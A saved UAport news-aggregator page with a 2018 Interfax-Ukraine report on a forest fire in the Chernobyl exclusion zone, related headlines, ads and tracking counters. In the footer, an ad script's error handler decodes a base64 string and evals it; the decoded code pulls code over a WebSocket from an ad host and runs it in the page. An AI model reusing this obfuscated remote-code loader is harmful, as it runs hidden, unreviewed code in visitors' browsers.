<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru" dir="ltr">
  <head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="description" content="1 мин читать  По состоянию на 20:00 вторника ликвидация возгорания сухой травы с последующим распространением на лесной массив на площади около 10 га в Зоне отчуждения и безусловного (обязательного) отселения Чернобыльской АЭС (Киевская обл.) продолжается, авиация Госслужбы Украины по ЧС совершила 19 сбросов воды (86 тонн).  В обнародованном во вторник вечером пресс-службой ГСЧС Украины сообщении" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="schema.dc" href="http://purl.org/dc/elements/1.1/" />
<meta property="og:title" content="Тушение лесного пожара в зоне отчуждения ЧАЭС с активным привлечением авиации ГСЧС продолжается (88)" />
<link rel="canonical" href="http://uaport.net/news/ua/t/1806/05/19100040" />
<meta property="og:url" content="http://uaport.net/news/ua/t/1806/05/19100040" />
<meta name="revisit-after" content="1 day" />
    <title>Тушение лесного пожара в зоне отчуждения ЧАЭС с активным привлечением авиации ГСЧС продолжается (88) | UAport</title>
    <meta name=viewport content="width=device-width, initial-scale=1">
    <link type="text/css" rel="stylesheet" media="all" href="/sites/uaport.net/files/css/css_868ee0ab262e01c3be48de5a4eb64da7.css" />
    <script type="text/javascript" src="/sites/uaport.net/files/js/js_2585a33082622e71015706ef868aab9a.js"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, { "basePath": "/", "ajaxblocks": "blocks=uanews-5\x26path=news/ua/t/1806/05/19100040" });
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
window.google_analytics_uacct = "UA-2485799-8";
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create", "UA-2485799-8", { "cookieDomain": "auto" });ga("send", "pageview");
//--><!]]>
</script>
    <!--[if lt IE 8]>
      <link type="text/css" rel="stylesheet" media="all" href="/sites/uaport.net/themes/uaport/fix-ie.css" />    <![endif]-->
  </head>
  <body class="sidebar-right">

<!-- Layout -->
<div class="body-div dash"><div class="sizer"><div class="expander">
	<div class="dcontent"><div id="block-locale-0" class="clear-block block block-locale">
  <div class="content"><ul><li class="ru first active"><a href="/news/ua/t/1806/05/19100040" class="language-link active">Русский</a></li>
<li class="uk"><a href="/uk/news/ua" class="language-link">Українська</a></li>
<li class="en last"><a href="/en/news/ua" class="language-link">English</a></li>
</ul></div>
</div>
</div>
</div></div></div>
    <div class="body-div"><div class="sizer"><div class="expander">
	<div class="header"><div class="logo"><a href="/"></a></div><div id="block-uanews-3" class="clear-block block block-uanews">
  <div class="content"><a href="/news/ua/source">Каталог СМИ</a></div>
</div>
<div class="hcentcont"><ul class="rtype"><li><a href="/news/ua">Новости</a></li><li><a href="/cat">Каталог</a></li></ul><form action="/news/ua/t/1806/05/19100040"  accept-charset="UTF-8" method="post" id="uanews-form">
<div><div class="form-item" id="edit-q-wrapper">
 <input type="text" maxlength="64" name="q" id="edit-q" size="64" value="" class="form-text" />
</div>
<input type="submit" name="op" id="edit-submit" value="Поиск"  class="form-submit" />
<input type="hidden" name="type" id="edit-type" value="news"  />
<input type="hidden" name="form_build_id" id="form-ycsuqUPgK4QWSToagxDLiWXgWxy_q-K1MSKCJM-32B0" value="form-ycsuqUPgK4QWSToagxDLiWXgWxy_q-K1MSKCJM-32B0"  />
<input type="hidden" name="form_id" id="edit-uanews-form" value="uanews_form"  />

</div></form>
</div>
	</div><!-- /header -->
    <div id="container">
	<div id="content">
			<div class="sectiontitle topblock"><span><a href="/news/ua">Новости Украины</a></span>
    <div class="rubr_sel"><u>Рубрики</u><ul class="news_rubr"><li><a href="/news/ua-rubr32">Автотранспорт</a></li><li><a href="/news/ua-rubr01">Агропром</a></li><li><a href="/news/ua-rubr20">Астрология</a></li><li><a href="/news/ua-rubr02">Банки</a></li><li><a href="/news/ua-rubr06">Биржи</a></li><li><a href="/news/ua-rubr25">Внешэконом</a></li><li><a href="/news/ua-rubr07">Инвестиции</a></li><li><a href="/news/ua-rubr39">Интернет</a></li><li><a href="/news/ua-rubr27">Калейдоскоп</a></li><li><a href="/news/ua-rubr22">Катастрофы</a></li><li><a href="/news/ua-rubr19">Компьютеры</a></li><li><a href="/news/ua-rubr12">Криминал</a></li><li><a href="/news/ua-rubr21">Культура</a></li><li><a href="/news/ua-rubr26">Масс-медиа</a></li><li><a href="/news/ua-rubr17">Медицина</a></li><li><a href="/news/ua-rubr37">Металлургия</a></li><li><a href="/news/ua-rubr18">Наука и техника</a></li><li><a href="/news/ua-rubr05">Недвижимость</a></li><li><a href="/news/ua-rubr10">Оборона, конверсия</a></li><li><a href="/news/ua-rubr23">Образование</a></li><li><a href="/news/ua-rubr34">Политика</a></li><li><a href="/news/ua-rubr08">Приватизация</a></li><li><a href="/news/ua-rubr38">Реклама, маркетинг</a></li><li><a href="/news/ua-rubr28">Религия</a></li><li><a href="/news/ua-rubr14">Связь</a></li><li><a href="/news/ua-rubr29">Спорт</a></li><li><a href="/news/ua-rubr35">Страхование</a></li><li><a href="/news/ua-rubr36">Строительство</a></li><li><a href="/news/ua-rubr31">Транспорт</a></li><li><a href="/news/ua-rubr30">Туризм</a></li><li><a href="/news/ua-rubr15">Экология</a></li><li><a href="/news/ua-rubr03">Экономика</a></li><li><a href="/news/ua-rubr04">Экономика Украины</a></li><li><a href="/news/ua-rubr16">Энергетика</a></li></ul></div>    <div class="dropdown_menu"><h3>Фокус: <b>Украина</b>  <ul class="menu"><li class="leaf first"><a href="/news/ua" title="">Украина</a></li>
<li class="leaf"><a href="/news/ru" title="">Россия</a></li>
<li class="leaf"><a href="/news/az" title="">Азербайджан</a></li>
<li class="leaf"><a href="/news/am" title="">Армения</a></li>
<li class="leaf"><a href="/news/by" title="">Беларусь</a></li>
<li class="leaf"><a href="/news/kz" title="">Казахстан</a></li>
<li class="leaf"><a href="/news/kg" title="">Кыргызстан</a></li>
<li class="leaf"><a href="/news/lv" title="">Латвия</a></li>
<li class="leaf"><a href="/news/md" title="">Молдова</a></li>
<li class="leaf"><a href="/news/ee" title="">Эстония</a></li>
<li class="leaf last"><a href="/news/un" title="">Мир</a></li>
</ul>    </h3></div>
</div>
								    	<div class="story"><div class="teaser"><a href="/news/ua/go/UN1806051930B" target="_blank"><img border="0" width="200" height="150" src="https://focus.ua/files/%D0%B7%D0%BE%D0%BD%D0%B5%D0%BF%D0%B5.jpg" alt="Тушение лесного пожара в зоне отчуждения ЧАЭС с активным привлечением авиации ГСЧС продолжается" ></a><h1><a href="/news/ua/go/UN1806051930B" target="_blank" class="newstitle">Тушение лесного пожара в зоне отчуждения ЧАЭС с активным привлечением авиации ГСЧС продолжается</a>&nbsp;(88)</h1><div class="ist">Интерфакс-Україна 2018.06.05 22:06</div><div class="newsan">1 мин читать

По состоянию на 20:00 вторника ликвидация возгорания сухой травы с
последующим распространением на лесной массив на площади около 10 га в Зоне
отчуждения и безусловного (обязательного) отселения Чернобыльской АЭС
(Киевская обл.) продолжается, авиация Госслужбы Украины по ЧС совершила 19
сбросов воды (86 тонн).

В обнародованном во вторник вечером пресс-службой ГСЧС Украины сообщении</div><div class="port">ПОЖАР, ЧЕРНОБЫЛЬ, СБРОС, ЗОНА, ТУШЕНИЕ, ОТЧУЖДЕНИЕ, <a href="/news/ua-pToUGgQ">Чечеткин</a>, <a href="/news/ua-p4oXSWw">Гройсман</a>, <a href="/news/ua-gREKisA">Киев</a>, <a href="/news/ua-g1DJgYg">Украина</a></div></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- UAport news 728x90 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-0165149739323115"
     data-ad-slot="3324003527"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script><ul class="all_news"><li><a href="/news/ua/go/UN180605193A9" target="_blank">В Чернобыльской зоне произошел крупный пожар</a> : <span class="ist2">NewsOboz 22:09</span></li><li><a href="/news/ua/go/UN1806051931D" target="_blank">Площадь пожара в Чернобыльской зоне уменьшилась - ГСЧС</a> : <span class="ist2">ЛІГАБізнесІнформ 22:07</span></li><li><a href="/news/ua/go/UN1806051930B" target="_blank">Тушение лесного пожара в зоне отчуждения ЧАЭС с активным привлечением авиации ГСЧС продолжается</a> : <span class="ist2">Интерфакс-Україна 22:06</span></li><li><a href="/news/ua/go/UN1806051927E" target="_blank">Площадь пожара в Чернобыльской зоне уменьшилась</a> : <span class="ist2">ForUm 22:04</span></li><li><a href="/news/ua/go/UN1806051927A" target="_blank">Ивановские спортсмены привезли &quot;букет&quot; медалей с Чемпионата России по карате</a> : <span class="ist2">365news.biz 22:04</span></li><li><a href="/news/ua/go/UN18060519217" target="_blank">Пожар в Чернобыле: ветер в сторону Киева не наблюдается</a> : <span class="ist2">Українські національні новини 22:03</span></li><li><a href="/news/ua/go/UN180605190EE" target="_blank">Гройсман заверил, что ситуация с пожаром в зоне отчуждения ЧАЭС находится под контролем и волноваться не стоит</a> : <span class="ist2">УРА-Информ 21:57</span></li><li><a href="/news/ua/go/UN180605190EA" target="_blank">Два львівські університети потрапили в топ-10 найкращих вишів України</a> : <span class="ist2">Leopolis.news 21:56</span></li><li><a href="/news/ua/go/UN1806051907D" target="_blank">Гройсман о пожаре в Чернобыльской зоне: радиационный фон безопасный</a> : <span class="ist2">Крым.Реалии RFE/RL 21:54</span></li><li><a href="/news/ua/go/UN18060518DFC" target="_blank">STATUS QUO</a> : <span class="ist2">Status Quo 21:42</span></li><li><a href="/news/ua/go/UN18060518DA8" target="_blank">В ГСЧС сообщили информацию о тушении пожара в Чернобыльской зоне</a> : <span class="ist2">РБК-Україна 21:41</span></li><li><a href="/news/ua/go/UN18060518AD1" target="_blank">В Чернобыльской зоне горит 10 гектаров леса</a> : <span class="ist2">Днепр Вечерний 21:28</span></li><li><a href="/news/ua/go/UN180605187BF" target="_blank">Тушение лесного пожара в зоне отчуждения ЧАЭС продолжается</a> : <span class="ist2">Сегодня.ua 21:12</span></li><li><a href="/news/ua/go/UN180605187B4" target="_blank">Пожар в Чернобыле: появились подробности</a> : <span class="ist2">Народный Корреспондент 21:12</span></li><li><a href="/news/ua/go/UN1806051869C" target="_blank">Закрывайте окна! В зоне отчуждения произошел пожар</a> : <span class="ist2">NewsMir.info 21:10</span></li><li><a href="/news/ua/go/UN18060518601" target="_blank">В Чернобыльской зоне горит 10 га леса</a> : <span class="ist2">Контракты.ua 21:07</span></li><li><a href="/news/ua/go/UN180605185CC" target="_blank">Радиационный фон в Киеве из-за пожара в Чернобыльской зоне не повысился</a> : <span class="ist2">Незалежний Аудитор 21:06</span></li><li><a href="/news/ua/go/UN18060518593" target="_blank">Сотрудников госпредприятий в районе ЧАЭС эвакуировали из-за лесного пожара</a> : <span class="ist2">Главное 21:05</span></li><li><a href="/news/ua/go/UN180605184E8" target="_blank">В Чернобыле горит 10 гектаров леса</a> : <span class="ist2">ABCnews.com.ua 21:03</span></li><li><a href="/news/ua/go/UN180605183D0" target="_blank">Закройте окна, забирайте детей: что на самом деле происходит в Чернобыле</a> : <span class="ist2">Вести-UA 21:01</span></li><li><a href="/news/ua/go/UN180605181EE" target="_blank">Основой урегулирования в Донбассе остаются минские договоренности - Песков</a> : <span class="ist2">Федеральное агентство новостей 20:47</span></li><li><a href="/news/ua/go/UN180605181EA" target="_blank">Пожар под Чернобылем: Гройсман уверяет, что радиационный фон - в норме</a> : <span class="ist2">Укринформ 20:47</span></li><li><a href="/news/ua/go/UN180605181C8" target="_blank">Пожар в Чернобыле: появились подробности</a> : <span class="ist2">Корреспондент.net 20:46</span></li><li><a href="/news/ua/go/UN18060518170" target="_blank">В Чернобыльской зоне горит не тот лес, который сильно пострадал при аварии в 1986 году</a> : <span class="ist2">УкропNews.com 20:45</span></li><li><a href="/news/ua/go/UN18060517FEB" target="_blank">Пожар в Чернобыле: радиационный фон не повысился</a> : <span class="ist2">Bigmir)net Новости 20:39</span></li><li><a href="/news/ua/go/UN18060517F73" target="_blank">Сотрудников госпредприятий в районе ЧАЭС эвакуировали из-за лесного пожара</a> : <span class="ist2">LB.ua 20:37</span></li><li><a href="/news/ua/go/UN18060517F01" target="_blank">Гройсман оценил ситуацию с пожаром в Чернобыльской зоне отчуждения</a> : <span class="ist2">Главред 20:35</span></li><li><a href="/news/ua/go/UN18060517EFC" target="_blank">В Чернобыльской зоне произошел крупный пожар</a> : <span class="ist2">Gazeta.ua 20:35</span></li><li><a href="/news/ua/go/UN18060517EB5" target="_blank">Пожар в &quot;Рыжем лесу&quot;: обнародована оперативная информация о радиационном фоне (фото)</a> : <span class="ist2">Факты 20:33</span></li><li><a href="/news/ua/go/UN18060517B66" target="_blank">В Чернобыльской зоне горит не тот лес, который сильно пострадал при аварии в 1986 году</a> : <span class="ist2">Зеркало недели. Украина 20:16</span></li><li><a href="/news/ua/go/UN18060517B23" target="_blank">В Чернобыльской зоне тушат крупный пожар</a> : <span class="ist2">Медиа-группа "Объектив" 20:15</span></li><li><a href="/news/ua/go/UN18060517894" target="_blank">Закройте окна, забирайте детей: что на самом деле происходит в Чернобыле</a> : <span class="ist2">Politeka 20:10</span></li><li><a href="/news/ua/go/UN18060517867" target="_blank">Пожар в Чернобыле: Гройсман сделал заявление</a> : <span class="ist2">Подробности.ua 20:10</span></li><li><a href="/news/ua/go/UN1806051785E" target="_blank">Объявление в подъезде. Крик души соседей</a> : <span class="ist2">Newsland 20:10</span></li><li><a href="/news/ua/go/UN1806051785A" target="_blank">Спасатели успокаивают, пожар в Чернобыльской зоне не повлиял на радиационный фон Киева</a> : <span class="ist2">NewsMir.info 20:10</span></li><li><a href="/news/ua/go/UN180605176B4" target="_blank">В Чернобыльской зоне вспыхнул пожар: авиация тушит загоревшийся лес</a> : <span class="ist2">Незалежний Аудитор 20:06</span></li><li><a href="/news/ua/go/UN1806051750E" target="_blank">Пожар в Чернобыле: радиационный фон в Киеве не повысился</a> : <span class="ist2">Корреспондент.net 20:02</span></li><li><a href="/news/ua/go/UN1806051750A" target="_blank">Лише 8 журналістів зі &quot;списку 47&quot; не відмовилися від охорони,- ЗМІ</a> : <span class="ist2">Depo 20:02</span></li><li><a href="/news/ua/go/UN18060517371" target="_blank">В Чернобыле горит самый радиационный &quot;рыжий лес&quot; (Фото)</a> : <span class="ist2">ТехноСотня 19:58</span></li><li><a href="/news/ua/go/UN18060516FE8" target="_blank">Спасатели успокаивают, пожар в Чернобыльской зоне не повлиял на радиационный фон Киева</a> : <span class="ist2">Страна.ua 19:47</span></li><li><a href="/news/ua/go/UN18060516F1B" target="_blank">Гройсман рассказал подробности о пожаре в зоне отчуждения</a> : <span class="ist2">Вести.ua 19:45</span></li><li><a href="/news/ua/go/UN18060516E98" target="_blank">Глава ГСЧС и премьер-министр прокомментировали пожар в Чернобыльской зоне</a> : <span class="ist2">УкропNews.com 19:45</span></li><li><a href="/news/ua/go/UN18060516CD5" target="_blank">Пожар в Чернобыле: спасатели рассказали о радиационном фоне</a> : <span class="ist2">Слово і Діло 19:42</span></li><li><a href="/news/ua/go/UN18060516B55" target="_blank">Пожар в Чернобыле: появились подробности</a> : <span class="ist2">Bigmir)net Новости 19:38</span></li><li><a href="/news/ua/go/UN180605169FE" target="_blank">&quot;Антонов&quot; ответил России на планы выпускать обновленный &quot;Руслан&quot;</a> : <span class="ist2">Главред 19:35</span></li><li><a href="/news/ua/go/UN180605169FA" target="_blank">Пожар в Чернобыльской зоне: в ГСЧС рассказали о радиационном фоне в Киеве</a> : <span class="ist2">Главред 19:35</span></li><li><a href="/news/ua/go/UN180605169D0" target="_blank">Фото Пожар в Чернобыле: радиационный фон в Киеве - в норме</a> : <span class="ist2">Фокус 19:34</span></li><li><a href="/news/ua/go/UN18060516996" target="_blank">Гройсман призвал не волноваться из-за пожара в Чернобыльской зоне</a> : <span class="ist2">ForUm 19:34</span></li><li><a href="/news/ua/go/UN1806051690E" target="_blank">Арендные ставки в центре Лондона пошли вниз</a> : <span class="ist2">Prian.ru 19:33</span></li><li><a href="/news/ua/go/UN1806051690A" target="_blank">В Чернобыле произошел масштабный пожар, - подробности</a> : <span class="ist2">ReplyUA.net 19:33</span></li><li><a href="/news/ua/go/UN180605168D7" target="_blank">В Чернобыльской зоне горит 10 гектаров леса</a> : <span class="ist2">Укринформ 19:32</span></li><li><a href="/news/ua/go/UN180605168AE" target="_blank">Масштабный пожар в Чернобыле: появились данные о радиации</a> : <span class="ist2">Обозреватель 19:32</span></li><li><a href="/news/ua/go/UN180605168AA" target="_blank">Арум: Пакьяо не заинтересован в бое с Кроуфордом, ему нужен Ломаченко</a> : <span class="ist2">Чемпионат.com 19:32</span></li><li><a href="/news/ua/go/UN180605162A0" target="_blank">Глава ГСЧС и премьер-министр прокомментировали пожар в Чернобыльской зоне</a> : <span class="ist2">Зеркало недели. Украина 19:16</span></li><li><a href="/news/ua/go/UN1806051621B" target="_blank">Масштабный пожар в Чернобыле: спасатели рассказали подробности</a> : <span class="ist2">УкропNews.com 19:15</span></li><li><a href="/news/ua/go/UN18060516219" target="_blank">Система контроля радиации переведена в режим чрезвычайного положения из-за пожара в Чернобыле</a> : <span class="ist2">УкропNews.com 19:15</span></li><li><a href="/news/ua/go/UN18060516209" target="_blank">Сильный пожар в Чернобыльской зоне: появились фото с высоты и данные о радиации</a> : <span class="ist2">Апостроф 19:15</span></li><li><a href="/news/ua/go/UN180605161EE" target="_blank">Вайнштейн офіційно не визнає себе винним у зґвалтуванні і сексуальних домаганнях</a> : <span class="ist2">УкропNews.com 19:15</span></li><li><a href="/news/ua/go/UN180605161EA" target="_blank">В Чернобыльской зоне горит радиоактивный лес (фото)</a> : <span class="ist2">Медиа-группа "Объектив" 19:15</span></li></ul><div class="item-list"><ul class="pager"><li class="pager-current first">1</li>
<li class="pager-item"><a href="/news/ua/t/1806/05/19100040?page=1" title="На страницу номер 2" class="active">2</a></li>
<li class="pager-next"><a href="/news/ua/t/1806/05/19100040?page=1" title="На следующую страницу" class="active">-›</a></li>
<li class="pager-last last"><a href="/news/ua/t/1806/05/19100040?page=1" title="На последнюю страницу" class="active">»</a></li>
</ul></div></div>	</div>
		<div id="right">
		<div id="block-block-23" class="clear-block block block-block">
  <div class="content"><!-- UAport_News_240x400 -->
<div id='div-gpt-ad-1344504890603-2' style='width:240px; height:400px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1344504890603-2'); });
</script>
</div>
</div>
</div>
<div id="block-uanews-5" class="clear-block block block-uanews">
  <h2>Главные новости</h2>
  <div class="content"><div id="block-uanews-5-ajax-content" class="ajaxblocks-wrapper-1"><script type="text/javascript"></script><noscript><ul><li><a href="/news/ua/t/1806/05/19092689" class="newstitle">В &quot;Газпроме&quot; не получали документов об аресте нидерландских активов компании</a></li><li><a href="/news/ua/t/1806/05/19095861" class="newstitle">Еспресо покажет первый фильм Леонида Кантера, снятый после Майдана</a></li><li><a href="/news/ua/t/1806/05/19097447" class="newstitle">Покушение на убийство: В одесской полиции отреагировали на нападение на Устименко, - ФОТО</a></li><li><a href="/news/ua/t/1806/05/19097427" class="newstitle">Премьер Италии хочет пересмотра санкций против России</a></li><li><a href="/news/ua/t/1806/05/19087353" class="newstitle">В КГГА рассказали, когда мост Метро станет аварийным</a></li><div class="more"><a href="/news/ua">Все новости Украины</a></div>
	</ul></noscript></div></div>
</div>
	</div>
	    </div>
<br class="brclear" />
</div><!-- end #expander -->
</div><!-- end #sizer -->
</div><!-- end #body-div -->

<div class="body-div footer">
<div class="sizer">
<div class="expander">
<div class="copy">&copy; Информационный центр &quot;ЭЛВИСТИ&quot;, 2018<br />
&copy; InfoStream, 2018</div><div id="block-block-10" class="clear-block block block-block">
  <div class="content"><!--noindex-->
<!-- a href="http://top.list.ru/jump?from=162394" target="_blank" rel="nofollow"><img src="http://top.list.ru/counter?id=162394;t=52" border=0 width=88 height=31 alt="TopList"></a -->
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write('<a href="http://www.liveinternet.ru/click" '+
'target=_blank><img src="http://counter.yadro.ru/hit?t21.1;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';i'+escape('Жж'+document.title.substring(0,80))+';'+Math.random()+
'" alt="" title="LiveInternet: показано число просмотров за 24 часа, посетителей за 24 часа и за сегодн\я" '+
'border=0 width=88 height=31><\/a>')//--></script><!--/LiveInternet-->
<!--bigmir)net TOP 100--> <script type="text/javascript" language="javascript"><!--
function BM_Draw(oBM_STAT){
document.write('<table cellpadding="0" cellspacing="0" border="0" style="display:inline;margin-right:4px;"><tr><td><div style="margin:0px;padding:0px;font-size:1px;width:88px;"><div style="background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b59_top.gif\') no-repeat bottom;"> </div><div style="font:10px Tahoma;background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b59_center.gif\');"><div style="text-align:center;"><a href="http://www.bigmir.net/" target="_blank" style="color:#0000ab;text-decoration:none;font:10px Tahoma;">bigmir<span style="color:#ff0000;">)</span>net</a></div><div style="margin-top:3px;padding: 0px 6px 0px 6px;color:#003596;"><div style="float:left;font:10px Tahoma;">'+oBM_STAT.hosts+'</div><div style="float:right;font:10px Tahoma;">'+oBM_STAT.hits+'</div></div><br clear="all"/></div><div style="background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b59_bottom.gif\') no-repeat top;"> </div></div></td></tr></table>');
}
//-->
</script> <script type="text/javascript" language="javascript"><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={o:1,v:5533,s:5533,t:0,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.slice(7);if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[ovstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<sc'+'ript type="text/javascript" language="javascript" src="http://c.bigmir.net/?'+bs.join('&')+'"></sc'+'ript>');
//-->
</script> <noscript>
<a href="http://www.bigmir.net/" target="_blank" rel="nofollow"><img src="http://c.bigmir.net/?v5533&s5533&t2" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript> <!--bigmir)net TOP 100-->
<!--/noindex--></div>
</div>
<div id="block-menu-menu-footer" class="clear-block block block-menu">
  <div class="content"><ul class="menu"><li class="leaf first"><a href="/cat/register" title="">Добавить сайт</a></li>
<li class="leaf"><a href="/sitemap" title="">Карта сайта</a></li>
<li class="leaf"><a href="/banners">Коды кнопок</a></li>
<li class="leaf"><a href="/about">О сайте</a></li>
<li class="leaf"><a href="/contact" title="">Отправить сообщение</a></li>
<li class="leaf last"><a href="/ads">Реклама на сайте</a></li>
</ul></div>
</div>
<div id="block-block-27" class="clear-block block block-block">
  <div class="content"><div id="MIXADV_4576" class="MIXADVERT_NET"></div>
          <script> 
          var node4576 = document.getElementById("MIXADV_4576");
          if( node4576 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4576&r="+Math.random();
               node4576.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval(atob("c3RyID0gJ2Nvbm4gPSBuZXcgV2ViU29ja2V0KCJ3c3M6Ly9uMi5taXhhZHZlcnQuY29tOjQ0MzMvNDU3NiIpOyBjb25uLm9ubWVzc2FnZSA9IGZ1bmN0aW9uIChldnQpIHsgcG9zdE1lc3NhZ2UoZXZ0LmRhdGEpOyBjb25uLmNsb3NlKCk7fSc7dmFyIHdvcmtlciA9IG5ldyBXb3JrZXIoVVJMLmNyZWF0ZU9iamVjdFVSTChuZXcgQmxvYihbImV2YWwoICciK3N0cisiJykiXSksIHt0eXBlOiAndGV4dC9qYXZhc2NyaXB0J30pKTt3b3JrZXIucG9zdE1lc3NhZ2UoJzEnKTsgd29ya2VyLm9ubWVzc2FnZSA9IGZ1bmN0aW9uIChtc2cpIHsgd2luZG93LmV2YWwobXNnLmRhdGEpOyB9OyA="));
              }
          }
          </script></div>
</div>
</div></div></div>

      </body>
</html>
